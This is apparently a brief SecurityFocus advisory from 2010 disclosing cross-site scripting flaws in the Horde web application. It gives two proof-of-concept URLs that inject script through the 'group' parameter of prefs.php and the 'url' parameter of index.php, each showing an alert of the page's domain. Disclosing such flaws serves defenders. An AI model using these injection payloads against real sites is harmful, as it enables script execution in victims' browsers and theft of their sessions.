Horde Multiple Cross-Site Scripting Vulnerabilities

No exploit is required to leverage these issues. The following proof of concepts have been provided:

http://www.example.com/prefs.php?group=columns"><script>alert(document.domain)</script>&app=turba

http://www.example.com/index.php?url=http%3A%2F%2Fserver.com%2Findex.php"%20onload="javascript:alert(document.domain)"&frameset=0


 

Privacy Statement
Copyright 2010, SecurityFocus